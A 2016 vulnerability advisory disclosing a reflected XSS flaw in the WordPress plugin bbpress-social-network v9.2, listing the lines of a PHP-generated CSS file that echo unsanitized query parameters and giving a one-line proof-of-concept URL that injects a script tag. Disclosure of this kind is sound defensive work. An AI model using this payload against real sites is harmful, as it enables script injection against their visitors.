Advisory #: 774
Title: Reflected XSS in wordpress plugin bbpress-social-network v9.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/bbpress-social-network
Downloads: 3365
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: bbpress-social-network
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./bbpress-social-network/css/ln_livenotifications_css.php: 640: color: <?php echo $_GET['dropdown_color'];?>; 673: color: <?php echo $_GET['dropdown_color'];?>; 700: background-color: <?php echo $_GET['banner_bgcolor']?>; 1009:/*background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;*/ 1063: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 1064: color: <?php echo $_GET['dropdown_link_color']?>; 1076: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 1082: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 1083: color: <?php echo $_GET['dropdown_link_color'];?>; 1095: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 1135: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 1143: background-color: <?php echo $_GET['dropdown_hover_bgcolor'];?>; 1150: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>; 1183: color: <?php echo $_GET['dropdown_link_color'];?>; 1187: color: <?php echo $_GET['dropdown_link_color'];?> !important; 1191: color: <?php echo $_GET['dropdown_link_color'];?>; 1196: color: <?php echo $_GET['dropdown_link_color'];?>; 1201: color: <?php echo $_GET['dropdown_link_color'];?>; 1232: color:<?php echo $_GET['dropdown_color'];?>; 1240: color: <?php echo $_GET['dropdown_link_color'];?>; 1250: color: <?php echo $_GET['dropdown_link_color'];?>; 1285: color: <?php echo $_GET['dropdown_link_color'];?>; 1292: color: <?php echo $_GET['dropdown_link_color'];?>; 1325: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?> right center no-repeat;*/ 1480: color: <?php echo $_GET['dropdown_link_color'];?> !important; 1493: color: <?php echo $_GET['dropdown_color'];?>; 1498: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 1499: background: <?php echo $_GET['dropdown_bit_color'];?>; 1510: border-top:1px solid <?php echo $_GET['dropdown_bit_color'];?>; 1554: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 1555: border-bottom:1px solid <?php echo $_GET['dropdown_boder_color'];?>; 1558: color: <?php echo $_GET['dropdown_color'];?>; The variable dropdown_color appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./bbpress-social-network/css/ln_livenotifications_css.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"